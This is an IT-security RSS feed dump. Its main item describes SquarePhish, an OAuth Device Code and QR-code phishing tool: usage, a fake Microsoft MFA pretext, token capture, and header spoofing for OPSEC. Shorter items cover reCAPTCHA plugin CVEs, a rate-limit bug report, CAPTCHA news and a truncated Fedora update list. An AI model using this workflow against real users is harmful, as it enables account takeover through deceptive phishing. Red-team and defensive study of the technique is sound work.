<content:encoded><![CDATA[<p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgttmELdITUTzXbOUGIkSlkLHY5zCtzi0UdrK9qCGGwrZUTAQYLFja6hoNtdwohNEiATcE62WZIcsP1_VbUEWT26Zn0yU5nRyPWPMGgDoDohnjWFs8fUcdlbuGuCkJstV18YEzPexF4XV62xaZAs3qkI2yY9DiyMgDAaZIcq0JJcfuxjFX2BnLRt8RRtw"><img alt="" border="0" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEgttmELdITUTzXbOUGIkSlkLHY5zCtzi0UdrK9qCGGwrZUTAQYLFja6hoNtdwohNEiATcE62WZIcsP1_VbUEWT26Zn0yU5nRyPWPMGgDoDohnjWFs8fUcdlbuGuCkJstV18YEzPexF4XV62xaZAs3qkI2yY9DiyMgDAaZIcq0JJcfuxjFX2BnLRt8RRtw=w516-h640" width="516"></a></p><div><br></div>  <p dir="auto">SquarePhish is an advanced <a href="https://www.kitploit.com/search/label/Phishing" target="_blank" title="phishing">phishing</a> tool that uses a technique combining the OAuth Device code <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> flow and QR codes.</p>  <blockquote>  <p dir="auto">See <a href="https://github.com/secureworks/PhishInSuits" rel="nofollow" target="_blank" title="PhishInSuits">PhishInSuits</a> for more details on using OAuth Device Code flow for phishing attacks.<span></span></p><a name="more"></a><p></p>  </blockquote>  <div><pre><code><br>   _____                            _____  _     _     _     <br>  / ____|                          |  __ \| |   (_)   | |    <br> | (___   __ _ _   _  __ _ _ __ ___| |__) | |__  _ ___| |__  <br>  \___ \ / _` | | | |/ _` | '__/ _ \  ___/| '_ \| / __| '_ \ <br>  ____) | (_| | |_| | (_| | | |  __/ |    | | | | \__ \ | | |<br> |_____/ \__, |\__,_|\__,_|_|  \___|_|    |_| |_|_|___/_| |_|<br>            | |                                              <br>            |_|                                            <br>                     _________<br>                    |         | /(<br>                    | O       |/ (<br>                    |&gt;        |\ (  v0.1.0<br>                    |_________| \(<br><br>usage: squish.py [-h] {email,server} ...<br><br>SquarePhish -- v0.1.0<br><br>optional arguments:<br>  -h, --help      show this help message and exit<br><br>modules:<br>  {email,server}<br>    email         send a malicious QR Code ema   il to a provided victim<br>    server        host a malicious server QR Codes generated via the 'email' module will <br>                  point to that will activate the malicious OAuth Device Code flow<br></code></pre></div>  <h2 dir="auto">Attack Steps</h2>  <p dir="auto">An attacker can use the <code>email</code> module of SquarePhish to send a malicious QR code email to a victim. The default pretext is that the victim is required to update their <a href="https://www.kitploit.com/search/label/Microsoft" target="_blank" title="Microsoft">Microsoft</a> MFA authentication to continue using mobile email. The current client ID in use is the Microsoft Authenticator App.</p>  <blockquote>  <p dir="auto">By sending a QR code first, the attacker can avoid prematurely starting the OAuth Device Code flow that lasts only 15 minutes.</p>  </blockquote>  <p dir="auto"><a href="https://github.com/secureworks/squarephish/blob/main/resc/1st_email.png" rel="nofollow" target="_blank" title="$ (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgttmELdITUTzXbOUGIkSlkLHY5zCtzi0UdrK9qCGGwrZUTAQYLFja6hoNtdwohNEiATcE62WZIcsP1_VbUEWT26Zn0yU5nRyPWPMGgDoDohnjWFs8fUcdlbuGuCkJstV18YEzPexF4XV62xaZAs3qkI2yY9DiyMgDAaZIcq0JJcfuxjFX2BnLRt8RRtw"><img alt="" border="0" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEgttmELdITUTzXbOUGIkSlkLHY5zCtzi0UdrK9qCGGwrZUTAQYLFja6hoNtdwohNEiATcE62WZIcsP1_VbUEWT26Zn0yU5nRyPWPMGgDoDohnjWFs8fUcdlbuGuCkJstV18YEzPexF4XV62xaZAs3qkI2yY9DiyMgDAaZIcq0JJcfuxjFX2BnLRt8RRtw=w516-h640" width="516"></a></p>  <p dir="auto">The victim will then scan the QR code found in the email body with their mobile device. The QR code will direct the victim to the attacker controlled server (running the <code>server</code> module of SquarePhish), with a URL paramater set to their email address.</p>  <p dir="auto"><a href="https://github.com/secureworks/squarephish/blob/main/resc/qrcode.png" rel="nofollow" target="_blank" title="$ (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEisc9z0jSx7X-P7u1J6BSB44M2ROK52tXgag6ApLECHeg4BowT1rhMCZX2KtsYvHbiZq_P2yLChO_W1RLYFiDe-IVlnmfgtLBkMwVc4kSWkuNzyyrq20AUMQrt1Mp7yqO6uGbzjsDJGuplbddJOAWab3oNm6C_gCQOhCG4_DIl2XmCGBNv0xnsyzmdfuw"><img alt="" border="0" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEisc9z0jSx7X-P7u1J6BSB44M2ROK52tXgag6ApLECHeg4BowT1rhMCZX2KtsYvHbiZq_P2yLChO_W1RLYFiDe-IVlnmfgtLBkMwVc4kSWkuNzyyrq20AUMQrt1Mp7yqO6uGbzjsDJGuplbddJOAWab3oNm6C_gCQOhCG4_DIl2XmCGBNv0xnsyzmdfuw=w370-h640" width="370"></a></p>  <p dir="auto">When the victim visits the malicious SquarePhish server, a background process is triggered that will start the OAuth Device Code authentication flow and email the victim a generated Device Code they are then required to enter into the legitimate Microsoft Device Code website (this will start the OAuth Device Code flow 15 minute timer).</p>  <p dir="auto"><a href="https://github.com/secureworks/squarephish/blob/main/resc/2nd_email.png" rel="nofollow" target="_blank" title="$ (7)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiH2Wm69-7ZH1OPOV8UAvFFQ7a1GoVc42kRpE1U9qG1L002JDjijFmfURPEMAPGVJnXG1FRxjLQu9TkvwG-HPNcRdtwY5R4mR3ecyhiPHgn5I50IbZYzZwNhetxwO-RSnXaAp3uj_7lIRbdYUN2Vs09peLqO9TDkF1snvhUS8ssU4b970kWW3-E6keHkg"><img alt="" border="0" height="412" src="https://blogger.googleusercontent.com/img/a/AVvXsEiH2Wm69-7ZH1OPOV8UAvFFQ7a1GoVc42kRpE1U9qG1L002JDjijFmfURPEMAPGVJnXG1FRxjLQu9TkvwG-HPNcRdtwY5R4mR3ecyhiPHgn5I50IbZYzZwNhetxwO-RSnXaAp3uj_7lIRbdYUN2Vs09peLqO9TDkF1snvhUS8ssU4b970kWW3-E6keHkg=w640-h412" width="640"></a></p>  <p dir="auto">The SquarePhish server will then continue to poll for authentication in the background.</p>  <div><pre><code>[2022-04-08 14:31:51,962] [info] [minnow@square.phish] Polling for user authentication...<br>[2022-04-08 14:31:57,185] [info] [minnow@square.phish] Polling for user authentication...<br>[2022-04-08 14:32:02,372] [info] [minnow@square.phish] Polling for user authentication...<br>[2022-04-08 14:32:07,516] [info] [minnow@square.phish] Polling for user authentication...<br>[2022-04-08 14:32:12,847] [info] [minnow@square.phish] Polling for user authentication...<br>[2022-04-08 14:32:17,993] [info] [minnow@square.phish] Polling for user authentication...<br>[2022-04-08 14:32:23,169] [info] [minnow@square.phish] Polling for user authentication...<br>[2022-04-08 14:32:28,492] [info] [minnow@square.phish] Polling for user authentication...<br></code></pre></div>  <p dir="auto">The victim will then visit the Microsoft Device Code authentication site from either the link provided in the email or via a redirect from visiting the SquarePhish URL on their mobile device.</p>  <p dir="auto"><a href="https://github.com/secureworks/squarephish/blob/main/resc/mssite.png" rel="nofollow" target="_blank" title="$ (8)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1KvJizK-OueapfwFqmFEf2vbmB2wM0Y_hP0MdB9xPLFWZiAe6uyhrUG5cD-U-zWN-6Aqt8-K57f0yzkWaV3OZQmbQt7zPiXv6z6m74SOX1lt_LJG9OYzaQyrdAJVTUSxGMaVxjZtSFiinUimP-T6dvFfuGyTGbLAddW-llc_Iqe0NFpIN8aoXRBUemg"><img alt="" border="0" height="506" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1KvJizK-OueapfwFqmFEf2vbmB2wM0Y_hP0MdB9xPLFWZiAe6uyhrUG5cD-U-zWN-6Aqt8-K57f0yzkWaV3OZQmbQt7zPiXv6z6m74SOX1lt_LJG9OYzaQyrdAJVTUSxGMaVxjZtSFiinUimP-T6dvFfuGyTGbLAddW-llc_Iqe0NFpIN8aoXRBUemg=w640-h506" width="640"></a></p>  <p dir="auto">The victim will then enter the provided Device Code and will be prompted for consent.</p>  <p dir="auto"><a href="https://github.com/secureworks/squarephish/blob/main/resc/consent.png" rel="nofollow" target="_blank" title="$ (9)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj4sds3-J8eqoDw3YrbtTWx5TzHxkKfAkChXSDTKCqmndk5xlWmX1Q5UOAdZ5oDHjZ0kPX5M07daccDCtcZcTJlDA_0BQhg9yzwECm52Qe12t0LEK34us9vaxt1E5u4iSOF8po9e-8MNkphnEq8K6TpUeBEJ79iOww4NY3ak4EfPqbYKFn7N15iutzFXg"><img alt="" border="0" height="500" src="https://blogger.googleusercontent.com/img/a/AVvXsEj4sds3-J8eqoDw3YrbtTWx5TzHxkKfAkChXSDTKCqmndk5xlWmX1Q5UOAdZ5oDHjZ0kPX5M07daccDCtcZcTJlDA_0BQhg9yzwECm52Qe12t0LEK34us9vaxt1E5u4iSOF8po9e-8MNkphnEq8K6TpUeBEJ79iOww4NY3ak4EfPqbYKFn7N15iutzFXg=w640-h500" width="640"></a></p>  <p dir="auto">After the victim authenticates and consents, an authentication token is saved locally and will provide the attacker access via the defined scope of the requesting application.</p>  <div><pre><code>[2022-04-08 14:32:28,796] [info] [minnow@square.phish] Token info saved to minnow@square.phish.tokeninfo.json<br></code></pre></div>  <p dir="auto">The current scope definition:</p>  <div><pre><code>"scope": ".default offline_access profile openid"<br></code></pre></div>  <h1 dir="auto">Usage</h1>  <blockquote>  <p dir="auto">!IMPORTANT: Before using either module, update the required information in the <a href="https://github.com/secureworks/squarephish/blob/main/settings.config" rel="nofollow" target="_blank" title="settings.config">settings.config</a> file noted with <code>Required</code>.</p>  </blockquote>  <h2 dir="auto">Email Module</h2>  <p dir="auto">Send the target victim a generated QR code that will trigger the OAuth Device Code flow.</p>  <div><pre><code>usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]<br><br>optional arguments:<br>  -h, --help            show this help message and exit<br><br>  -c CONFIG, --config CONFIG<br>                        squarephish config file [Default: settings.config]<br><br>  --debug               enable server debugging<br><br>  -e EMAIL, --email EMAIL<br>                        victim email address to send initial QR code email to<br></code></pre></div>  <h2 dir="auto">Server Module</h2>  <p dir="auto">Host a server that a generated QR code will be pointed to and when requested will trigger the OAuth Device Code flow.</p>  <div><pre><code>usage: squish.py server [-h] [-c CONFIG] [--debug]<br><br>optional arguments:<br>  -h, --help            show this help message and exit<br><br>  -c CONFIG, --config CONFIG<br>                        squarephish config file [Default: settings.config]<br><br>  --debug               enable server debugging<br></code></pre></div>  <h2 dir="auto">Configuration</h2>  <p dir="auto">All of the applicable settings for execution can be found and modified via the <a href="https://github.com/secureworks/squarephish/blob/main/settings.config" rel="nofollow" target="_blank" title="settings.config">settings.config</a> file. There are several pieces of required information that do not have a default value that must be filled out by the user: SMTP_EMAIL, SMTP_PASSWORD, and SQUAREPHISH_SERVER (only when executing the email module). All configuration options have been documented within the settings file via in-line comments.</p>  <p dir="auto"><strong>Note</strong>: The <code>SQUAREPHISH_</code> values present in the 'EMAIL' section of the configuration should match the values set when running the SquarePhish server.</p>  <div>Custom Pretexts  <p dir="auto">Currently, the pre-defined pretexts can be found in the <a href="https://github.com/secureworks/squarephish/blob/main/pretexts" rel="nofollow" target="_blank" title="pretexts">pretexts</a> folder.</p>  <p dir="auto">To write custom pretexts, use the existing template via the <a href="https://github.com/secureworks/squarephish/blob/main/pretexts/iphone" rel="nofollow" target="_blank" title="pretexts/iphone/">pretexts/iphone/</a> folder. An email template is required for both the initial QR code email as well as the follow up device code email.</p>  <p dir="auto"><strong>Important</strong>: When writing a custom pretext, note the existence of <code>%s</code> in both pretext templates. This exists to allow SquarePhish to populate the correct data when generating emails (QR code data and/or device code value).</p>  <h2 dir="auto">OPSEC</h2>  <p dir="auto">There are several HTTP response headers defined in the <a href="https://github.com/secureworks/squarephish/blob/main/squarephish/utils.py#L28" rel="nofollow" target="_blank" title="utils.py">utils.py</a> file. These headers are defined to <a href="https://www.kitploit.com/search/label/OverRide" target="_blank" title="override">override</a> any existing Flask response header values and to provide a more 'legitimate' response from the server. These header values can be modified, removed and/or additional headers can be included for better OPSEC.</p>  <div class="highlight highlight-source-json notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='{      "vary": "Accept-Encoding",      "server": "Microsoft-IIS/10.0",      "tls_version": "tls1.3",      "content-type": "text/html; charset=utf-8",      "x-appversion": "1.0.8125.42964",      "x-frame-options": "SAMEORIGIN",      "x-ua-compatible": "IE=Edge;chrome=1",      "x-xss-protection": "1; mode=block",      "x-content-type-options": "nosniff",      "strict-transport-security": "max-age=31536000",  }' dir="auto"><pre><code>{<br>    "vary": "Accept-Encoding",<br>    "server": "Microsoft-IIS/10.0",<br>    "tls_version": "tls1.3",<br>    "content-type": "text/html; charset=utf-8",<br>    "x-appversion": "1.0.8125.42964",<br>    "x-frame-options": "SAMEORIGIN",<br>    "x-ua-compatible": "IE=Edge;chrome=1",<br>    "x-xss-protection": "1; mode=block",<br>    "x-content-type-options": "nosniff",<br>    "strict-transport-security": "max-age=31536000",<br>}</code></pre></div>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/secureworks/squarephish" rel="nofollow" target="_blank" title="Download Squarephish">Download Squarephish</a></span></b></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Der Streit um Microsoft 365, Recaptcha und Google Fonts]]></title>
<description><![CDATA[$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('NpEZUhEPGWE');
									});]]></description>
<link>https://tsecurity.de/de/1728399/it-security-video/der-streit-um-microsoft-365-recaptcha-und-google-fonts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1728399/it-security-video/der-streit-um-microsoft-365-recaptcha-und-google-fonts/</guid>
<pubDate>Sun, 11 Dec 2022 18:16:14 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/NpEZUhEPGWE/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<div id="ytplayer_NpEZUhEPGWE"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('NpEZUhEPGWE');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3831]]></title>
<description><![CDATA[The reCAPTCHA WordPress plugin through 1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).]]></description>
<link>https://tsecurity.de/de/1710169/sicherheitsluecken/cve-2022-3831/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1710169/sicherheitsluecken/cve-2022-3831/</guid>
<pubDate>Mon, 28 Nov 2022 16:48:57 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The reCAPTCHA WordPress plugin through 1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-2913 | Login No Captcha reCAPTCHA Plugin up to 1.6 on WordPress Login Screen authorization]]></title>
<description><![CDATA[A vulnerability was found in  Login No Captcha reCAPTCHA Plugin up to 1.6. It has been classified as critical. Affected is an unknown function of the component Login Screen. The manipulation leads to authorization bypass.

This vulnerability is traded as CVE-2022-2913. The attack needs to be appr...]]></description>
<link>https://tsecurity.de/de/1667768/sicherheitsluecken/cve-2022-2913-login-no-captcha-recaptcha-plugin-up-to-16-on-wordpress-login-screen-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1667768/sicherheitsluecken/cve-2022-2913-login-no-captcha-recaptcha-plugin-up-to-16-on-wordpress-login-screen-authorization/</guid>
<pubDate>Wed, 19 Oct 2022 10:04:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in  Login No Captcha reCAPTCHA Plugin up to 1.6. It has been classified as critical. Affected is an unknown function of the component <em>Login Screen</em>. The manipulation leads to authorization bypass.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.208824">CVE-2022-2913</a>. The attack needs to be approached within the local network. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Yelp: No rate limit on subscribe form]]></title>
<description><![CDATA[Summary: Hi team, I found that you missing a rate limit protection for subscribe form  Platform(s) Affected: https://business.yelp.com/?source=consumer_site_header&amp;utm_content=header&amp;utm_medium=www&amp;utm_source=cons_home Steps To Reproduce:  go to https://business.yelp.com/?source=consu...]]></description>
<link>https://tsecurity.de/de/1657328/sicherheitsluecken/yelp-no-rate-limit-on-subscribe-form/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1657328/sicherheitsluecken/yelp-no-rate-limit-on-subscribe-form/</guid>
<pubDate>Mon, 10 Oct 2022 20:34:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<br><img height="200" width="200" src="http://vulners.com/static/img/hackerone.png" alt="image"><br>Summary: Hi team, I found that you missing a rate limit protection for subscribe form  Platform(s) Affected: https://business.yelp.com/?source=consumer_site_header&amp;amp;utm_content=header&amp;amp;utm_medium=www&amp;amp;utm_source=cons_home Steps To Reproduce:  go to https://business.yelp.com/?source=consumer_site_header&amp;amp;utm_content=header&amp;amp;utm_medium=www&amp;amp;utm_source=cons_home find a form with just email input (emailsub.png) fill it with email click on submit then intercept the request  send to burp intruder  go to  -&amp;gt; positions clear § add § in email like youremail§1§@gmail.com go to -&amp;gt; payloads,  add numbers type paylaod like ( from : 2 , to : 100, step: 1) start attack you will see all response with 200 ok and contain msg Thanks for subscribing! so no rate limit implemented  Fix: add a recaptcha or 429 error (many requests) Supporting Material/References: see screenshots Impact No rate limit in...]]></content:encoded>
</item>
<item>
<title><![CDATA[Nie mehr Ampeln, Enten und Busse suchen: Cloudflare startet CAPTCHA-Konkurrenten]]></title>
<description><![CDATA[Turnstile soll Googles marktdominierenden reCAPTCHA den Rang ablaufen. Für die Validierung braucht das Tool keine Interaktion, wie etwa nervige Bildersuchen.]]></description>
<link>https://tsecurity.de/de/1646172/it-nachrichten/nie-mehr-ampeln-enten-und-busse-suchen-cloudflare-startet-captcha-konkurrenten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1646172/it-nachrichten/nie-mehr-ampeln-enten-und-busse-suchen-cloudflare-startet-captcha-konkurrenten/</guid>
<pubDate>Thu, 29 Sep 2022 10:49:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Turnstile soll Googles marktdominierenden reCAPTCHA den Rang ablaufen. Für die Validierung braucht das Tool keine Interaktion, wie etwa nervige Bildersuchen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nie mehr Ampeln, Enten und Busse suchen: Cloudflare startet CAPTCHA-Konkurrenten]]></title>
<description><![CDATA[Turnstile soll Googles marktdominierenden reCAPTCHA den Rang ablaufen. Für die Validierung braucht das Tool keine Interaktion, wie etwa nervige Bildersuchen.]]></description>
<link>https://tsecurity.de/de/1646151/it-security-nachrichten/nie-mehr-ampeln-enten-und-busse-suchen-cloudflare-startet-captcha-konkurrenten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1646151/it-security-nachrichten/nie-mehr-ampeln-enten-und-busse-suchen-cloudflare-startet-captcha-konkurrenten/</guid>
<pubDate>Thu, 29 Sep 2022 10:48:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Turnstile soll Googles marktdominierenden reCAPTCHA den Rang ablaufen. Für die Validierung braucht das Tool keine Interaktion, wie etwa nervige Bildersuchen.]]></content:encoded>
</item>
<item>
<title><![CDATA["Jeder hasst sie": Cloudflare will Captchas den Todesstoß versetzen]]></title>
<description><![CDATA[Wenn man zehn Menschen nach der größten Plage des Web fragt, dann werden vermutlich elf "Captchas" antworten. Versuche, Captchas abzuschaffen, gibt es immer wieder, Cloudflare startet nun den nächsten, denn das Content Delivery Network hat Turnstile angekündigt.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/1646102/it-security-nachrichten/jeder-hasst-sie-cloudflare-will-captchas-den-todesstoss-versetzen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1646102/it-security-nachrichten/jeder-hasst-sie-cloudflare-will-captchas-den-todesstoss-versetzen/</guid>
<pubDate>Thu, 29 Sep 2022 09:33:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,132143.html"><img hspace="5" border="0" align="left" alt="CloudFlare, Captcha, Recaptcha, Turnstile, Captcha-Alternative" width="660" height="371" src="https://i.wfcdn.de/teaser/660/59293.png"></a>
			Wenn man zehn Menschen nach der größten Plage des Web fragt, dann werden vermutlich elf "Captchas" antworten. Versuche, Captchas abzuschaffen, gibt es immer wieder, <a href="https://winfuture.de/special/cloud/" title="Cloud Special">Cloudflare</a> startet nun den nächsten, denn das Content Delivery Network hat Turnstile angekündigt.			(<a href="https://winfuture.de/news,132143.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-2913]]></title>
<description><![CDATA[The Login No Captcha reCAPTCHA WordPress plugin before 1.7 doesn't check the proper IP address allowing attackers to spoof IP addresses on the allow list and bypass the need for captcha on the login screen.]]></description>
<link>https://tsecurity.de/de/1633229/sicherheitsluecken/cve-2022-2913/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1633229/sicherheitsluecken/cve-2022-2913/</guid>
<pubDate>Fri, 16 Sep 2022 12:19:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Login No Captcha reCAPTCHA WordPress plugin before 1.7 doesn't check the proper IP address allowing attackers to spoof IP addresses on the allow list and bypass the need for captcha on the login screen.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2007-4982 | MW6 Technologies QRCode ActiveX path traversal (XFDB-36666 / EDB-4420)]]></title>
<description><![CDATA[A vulnerability was found in  MW6 Technologies QRCode ActiveX. It has been declared as very critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to path traversal.

This vulnerability is known as CVE-2007-4982. The attack can be launched remotely. Furthermo...]]></description>
<link>https://tsecurity.de/de/1599647/sicherheitsluecken/cve-2007-4982-mw6-technologies-qrcode-activex-path-traversal-xfdb-36666-edb-4420/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1599647/sicherheitsluecken/cve-2007-4982-mw6-technologies-qrcode-activex-path-traversal-xfdb-36666-edb-4420/</guid>
<pubDate>Fri, 12 Aug 2022 13:31:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in  MW6 Technologies QRCode ActiveX. It has been declared as very critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to path traversal.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.85939">CVE-2007-4982</a>. The attack can be launched remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (booth, libpgjava, and thunderbird), Fedora (3mux, act, age, antlr4-project, apache-cloudstack-cloudmonkey, apptainer, aquatone, aron, asnip, assetfinder, astral, bettercap, buildah, butane, caddy, cadvisor, cheat, chisel, clash, clipman, commit-stream,...]]></description>
<link>https://tsecurity.de/de/1588116/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1588116/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 01 Aug 2022 15:30:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (booth, libpgjava, and thunderbird), <b>Fedora</b> (3mux, act, age, antlr4-project, apache-cloudstack-cloudmonkey, apptainer, aquatone, aron, asnip, assetfinder, astral, bettercap, buildah, butane, caddy, cadvisor, cheat, chisel, clash, clipman, commit-stream, containerd, cri-o, darkman, deepin-gir-generator, direnv, dnscrypt-proxy, dnsx, docker-distribution, doctl, douceur, duf, ffuf, fzf, geoipupdate, git-lfs, git-octopus, git-time-metric, glide, gmailctl, gnutls, go-bindata, goaltdns, gobuster, godep, godoctor, godotenv, gojq, golang-ariga-atlas, golang-bug-serial-1, golang-contrib-opencensus-resource, golang-entgo-ent, golang-etcd-bbolt, golang-gioui, golang-github-a8m-envsubst, golang-github-a8m-tree, golang-github-acme-lego, golang-github-ajstarks-deck, golang-github-akavel-rsrc, golang-github-alecthomas-chroma, golang-github-aliyun-ossutil, golang-github-apache-beam-2, golang-github-appc-docker2aci, golang-github-appc-goaci, golang-github-appc-spec, golang-github-aryann-difflib, golang-github-aws-lambda, golang-github-axgle-mahonia, golang-github-bifurcation-mint, golang-github-bobesa-domain-util, golang-github-burntsushi-toml, golang-github-burntsushi-toml-test, golang-github-burntsushi-xgb, golang-github-c-bata-prompt, golang-github-cactus-statsd-client, golang-github-cespare-xxhash, golang-github-chai2010-gettext, golang-github-chris-ramon-douceur, golang-github-christrenkamp-goxpath, golang-github-chromedp-cdproto, golang-github-cilium-ebpf, golang-github-client9-gospell, golang-github-client9-plaintext, golang-github-cloudflare, golang-github-cloudflare-redoctober, golang-github-cockroachdb-pebble, golang-github-colinmarc-hdfs-2, golang-github-containerd-continuity, golang-github-containerd-fuse-overlayfs-snapshotter, golang-github-containernetworking-cni, golang-github-coredns-corefile-migration, golang-github-cpu-goacmedns, golang-github-cpuguy83-md2man, golang-github-crossdock, golang-github-cucumber-godog, golang-github-cyberdotgent-route3270, golang-github-dave-jennifer, golang-github-deepmap-oapi-codegen, golang-github-denisbrodbeck-machineid, golang-github-dgrijalva-jwt, golang-github-distribution-3, golang-github-dreamacro-shadowsocks2, golang-github-dustinkirkland-petname, golang-github-eknkc-amber, golang-github-elazarl-bindata-assetfs, golang-github-emersion-smtp, golang-github-envoyproxy-protoc-gen-validate, golang-github-etcd-io-gofail, golang-github-euank-kmsg-parser, golang-github-evanphx-json-patch, golang-github-evanw-esbuild, golang-github-facebook-time, golang-github-facebookincubator-contest, golang-github-facebookincubator-dhcplb, golang-github-facebookincubator-go2chef, golang-github-facebookincubator-nvdtools, golang-github-fernet, golang-github-francoispqt-gojay, golang-github-fvbommel-util, golang-github-gdamore-tcell, golang-github-gdamore-tcell-2, golang-github-geertjohan-rice, golang-github-gobuffalo-here, golang-github-gobwas-ws, golang-github-goccy-yaml, golang-github-gocolly-colly-2, golang-github-gogo-googleapis, golang-github-gohugoio-testmodbuilder, golang-github-gojuno-minimock, golang-github-google-jsonnet, golang-github-google-martian, golang-github-google-pprof, golang-github-google-slothfs, golang-github-google-wire, golang-github-googleapis-gnostic, golang-github-googlecloudplatform-cloudsql-proxy, golang-github-gorhill-cronexpr, golang-github-gosexy-gettext, golang-github-grpc-ecosystem-gateway-2, golang-github-gucumber, golang-github-haproxytech-dataplaneapi, golang-github-hashicorp-consul-migrate, golang-github-hashicorp-hclog, golang-github-hashicorp-memdb, golang-github-hashicorp-serf, golang-github-hashicorp-sockaddr, golang-github-heistp-irtt, golang-github-hexdigest-gowrap, golang-github-hpcloud-tail, golang-github-hub, golang-github-insomniacslk-termhook, golang-github-instrumenta-kubeval, golang-github-j-keck-arping, golang-github-jmespath, golang-github-jsonnet-bundler, golang-github-jwt, golang-github-kalafut-imohash, golang-github-kr-text, golang-github-krishicks-yaml-patch, golang-github-kyokomi-emoji, golang-github-ledisdb, golang-github-leonelquinteros-gotext, golang-github-letsencrypt-pebble, golang-github-leveldb, golang-github-liamg-scout, golang-github-liamg-tml, golang-github-lofanmi-pinyin, golang-github-lunixbochs-vtclean, golang-github-magefile-mage, golang-github-mailru-easyjson, golang-github-markbates-pkger, golang-github-martinhoefling-goxkcdpwgen, golang-github-mattn-colorable, golang-github-mbndr-figlet4go, golang-github-mdlayher-dhcp6, golang-github-mdlayher-ethernet, golang-github-mgutz-ansi, golang-github-mholt-archiver, golang-github-microcosm-cc-bluemonday, golang-github-mmarkdown-mmark, golang-github-mock, golang-github-morikuni-aec, golang-github-mozillazg-pinyin, golang-github-mroach-rom64, golang-github-mrunalp-fileutils, golang-github-msprev-fzf-bibtex, golang-github-multiformats-multibase, golang-github-multiformats-multihash, golang-github-mvo5-uboot, golang-github-nats-io-nkeys, golang-github-nats-io-streaming-server, golang-github-nbutton23-zxcvbn, golang-github-nicksnyder-i18n-2, golang-github-niklasfasching-org, golang-github-oklog, golang-github-oklog-ulid, golang-github-olekukonko-tablewriter, golang-github-oneofone-xxhash, golang-github-onsi-ginkgo-2, golang-github-openprinting-ipp-usb, golang-github-pact-foundation, golang-github-path-network-mmproxy, golang-github-pdfcpu, golang-github-pelletier-toml, golang-github-pelletier-toml-2, golang-github-phayes-freeport, golang-github-pierrec-lz4, golang-github-pierrre-geohash, golang-github-posener-complete, golang-github-posener-complete-2, golang-github-pquerna-ffjson, golang-github-pressly-goose, golang-github-projectdiscovery-chaos-client, golang-github-projectdiscovery-mapcidr, golang-github-prometheus, golang-github-prometheus-node-exporter, golang-github-prometheus-prom2json, 